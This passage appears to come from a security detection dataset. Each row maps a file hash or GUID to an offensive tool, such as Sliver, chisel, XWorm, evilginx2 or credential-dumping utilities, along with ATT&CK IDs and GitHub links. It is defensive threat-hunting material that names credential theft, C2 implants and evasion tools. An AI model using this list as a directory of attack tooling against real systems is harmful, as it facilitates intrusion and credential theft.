fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e634b7711fbe4e8f83481dbb2191faba51915d5533ec94db6fb2f1029161d0d8*",".{0,1000}e634b7711fbe4e8f83481dbb2191faba51915d5533ec94db6fb2f1029161d0d8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e6351ad6e15aa6faa8d9ff9b476e66c6b6970c2f7ad7a04b08e0c7ee1af043bd*",".{0,1000}e6351ad6e15aa6faa8d9ff9b476e66c6b6970c2f7ad7a04b08e0c7ee1af043bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e6428916f71a100481e78f6dac951b5c9e885b53dc8f1ab4e9e8a719528f70b8*",".{0,1000}e6428916f71a100481e78f6dac951b5c9e885b53dc8f1ab4e9e8a719528f70b8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e685904d607a73c1916b6a7d9cc2eb42e4afd1cf2e77e728b7dbeb141eda2735*",".{0,1000}e685904d607a73c1916b6a7d9cc2eb42e4afd1cf2e77e728b7dbeb141eda2735.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential 
Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*e6c2db94a0b0f667ef69e2e28e507a5e7fa629636b93506c119ccac224d74e62*",".{0,1000}e6c2db94a0b0f667ef69e2e28e507a5e7fa629636b93506c119ccac224d74e62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e6cab14548d77b0f7829ceb222c1b634432afd423dcbf61e160634096b82bce2*",".{0,1000}e6cab14548d77b0f7829ceb222c1b634432afd423dcbf61e160634096b82bce2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e6db508c611d834b9ad9f20bebef8507fec5f642a051ea1c6ae659b729db3c1c*",".{0,1000}e6db508c611d834b9ad9f20bebef8507fec5f642a051ea1c6ae659b729db3c1c.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" 
"*e6e05a88178633c271919ae5ea4c9633991774e2fd345ffe3052c209e2ef31d5*",".{0,1000}e6e05a88178633c271919ae5ea4c9633991774e2fd345ffe3052c209e2ef31d5.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","file_hash","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*e6e37edd595cc04216682cda2af0ef0d0580fd3c8c808fb65df547c432ee9a43*",".{0,1000}e6e37edd595cc04216682cda2af0ef0d0580fd3c8c808fb65df547c432ee9a43.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*e6ea547331fd4daf15426484f27c256d680bca82d911c038ec1e1b97e1a2e14e*",".{0,1000}e6ea547331fd4daf15426484f27c256d680bca82d911c038ec1e1b97e1a2e14e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e6f1d80937b4c202ff8f79e77bfa5cbadc0a42975234f981b0b85dd7c8aa75cf*",".{0,1000}e6f1d80937b4c202ff8f79e77bfa5cbadc0a42975234f981b0b85dd7c8aa75cf.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e704bd6ebe126565b2334547aac8ef9bfcd9e3ec5ccf59b6e86d5b857610aa70*",".{0,1000}e704bd6ebe126565b2334547aac8ef9bfcd9e3ec5ccf59b6e86d5b857610aa70.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E731C71B-4D1B-4BE7-AA4D-EDA52AF7F256*",".{0,1000}E731C71B\-4D1B\-4BE7\-AA4D\-EDA52AF7F256.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*e7370f93d1d0cde622a1f8e1c04877d8463912d04d973331ad4851f04de6915a*",".{0,1000}e7370f93d1d0cde622a1f8e1c04877d8463912d04d973331ad4851f04de6915a.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*e75171190134063cc579d897bd1bd45370e3616b134398d239491c6382d3775f*",".{0,1000}e75171190134063cc579d897bd1bd45370e3616b134398d239491c6382d3775f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e754181c7e46930dab3fab1056569be0f6fa13cbdc77a87e91ee5c4bc83f658d*",".{0,1000}e754181c7e46930dab3fab1056569be0f6fa13cbdc77a87e91ee5c4bc83f658d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e*",".{0,1000}e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*e793dfecc85224131dd071a5ff7b9ea7c01156879879701951152090bab15ac5*",".{0,1000}e793dfecc85224131dd071a5ff7b9ea7c01156879879701951152090bab15ac5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e7a9855e85e1d0040e342e54182576f7f12e7f7fbe0debe50cc434f8215f0172*",".{0,1000}e7a9855e85e1d0040e342e54182576f7f12e7f7fbe0debe50cc434f8215f0172.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E7F99164-F00F-4B2A-86A9-8EB5F659F34C*",".{0,1000}E7F99164\-F00F\-4B2A\-86A9\-8EB5F659F34C.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*e7fe93ae48f18878e1476a2aaaf46af6da778d2f3a33dfe27c8d18cc890e1e7c*",".{0,1000}e7fe93ae48f18878e1476a2aaaf46af6da778d2f3a33dfe27c8d18cc890e1e7c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e81284fcd76acab65fcb296db056f50a4fa61eb120581ff2d494006d97f2f762*",".{0,1000}e81284fcd76acab65fcb296db056f50a4fa61eb120581ff2d494006d97f2f762.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*E82BCAD1-0D2B-4E95-B382-933CF78A8128*",".{0,1000}E82BCAD1\-0D2B\-4E95\-B382\-933CF78A8128.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*E832E9B8-2158-4FC0-89A1-56C6ECC10F6B*",".{0,1000}E832E9B8\-2158\-4FC0\-89A1\-56C6ECC10F6B.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" 
"*e8336778c23574464fae2551b27074d52a949d7c97fe3fd0d8351f3f340e811b*",".{0,1000}e8336778c23574464fae2551b27074d52a949d7c97fe3fd0d8351f3f340e811b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e848c25347ea3027e46eb9825cc47f3e8eaf44c5aead6691d6ea61c27cd4b136*",".{0,1000}e848c25347ea3027e46eb9825cc47f3e8eaf44c5aead6691d6ea61c27cd4b136.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e86f3bf9daab62a33014d63811a020cab6ebb0570a8cea4496b1ee586ad6c5bd*",".{0,1000}e86f3bf9daab62a33014d63811a020cab6ebb0570a8cea4496b1ee586ad6c5bd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e88262454c26daae342bea04507e03b8b49599d5fd2d5ec81027e685333a4104*",".{0,1000}e88262454c26daae342bea04507e03b8b49599d5fd2d5ec81027e685333a4104.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e888bdb98dec5ad0f33feec1ce1563987ae364a7d27da8a1676d763d1d04fbef*",".{0,1000}e888bdb98dec5ad0f33feec1ce1563987ae364a7d27da8a1676d763d1d04fbef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e8c419d7176ad443676893924e1a1c0871bda59e512297b9b5846bebe9568b56*",".{0,1000}e8c419d7176ad443676893924e1a1c0871bda59e512297b9b5846bebe9568b56.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e8c42b6656710ed22955acf7a112ba19b6f4ccd8c6fd195f9133539eeb1aa692*",".{0,1000}e8c42b6656710ed22955acf7a112ba19b6f4ccd8c6fd195f9133539eeb1aa692.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e8de489a84256609ac4e2b5236737d953af63fed9601d3f69253a5f199d901fc*",".{0,1000}e8de489a84256609ac4e2b5236737d953af63fed9601d3f69253a5f199d901fc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e8e43ef253fac38fa05323b327609c182bb1b5342d340301424deeaf1bd26673*",".{0,1000}e8e43ef253fac38fa05323b327609c182bb1b5342d340301424deeaf1bd26673.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e9255f6726a695cab4ecf9d7ac34c1dd5dde9ac55a3289892a43ee7869e2a0f1*",".{0,1000}e9255f6726a695cab4ecf9d7ac34c1dd5dde9ac55a3289892a43ee7869e2a0f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e92707537fe99713752f3d3f479fa68a0c8dd80439c13a2bb4ebb36a952b63fd*",".{0,1000}e92707537fe99713752f3d3f479fa68a0c8dd80439c13a2bb4ebb36a952b63fd.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - 
Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*e954e3675ef895c2a316f74b5801d9966597c35bf728020add026fc9e56473e6*",".{0,1000}e954e3675ef895c2a316f74b5801d9966597c35bf728020add026fc9e56473e6.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*e96e826e534e4ed95244cfdb1147d13b3805c46468be98ed540be2fab68d586d*",".{0,1000}e96e826e534e4ed95244cfdb1147d13b3805c46468be98ed540be2fab68d586d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8*",".{0,1000}e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*e984f5efade9dcf131cc020a3c3ebf27f7b191eede39b09969be4d36a1ba9fb2*",".{0,1000}e984f5efade9dcf131cc020a3c3ebf27f7b191eede39b09969be4d36a1ba9fb2.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - 
T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*e988e9a36810fb0fa0fb32556cb93c8ea4117e4176402ff74e397bd4a4d125d6*",".{0,1000}e988e9a36810fb0fa0fb32556cb93c8ea4117e4176402ff74e397bd4a4d125d6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*E991E6A7-31EA-42E3-A471-90F0090E3AFD*",".{0,1000}E991E6A7\-31EA\-42E3\-A471\-90F0090E3AFD.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*e99a3bec641c578ceaa05b63b6544daf5b437361c1a5f8742808d8a09df5bca6*",".{0,1000}e99a3bec641c578ceaa05b63b6544daf5b437361c1a5f8742808d8a09df5bca6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
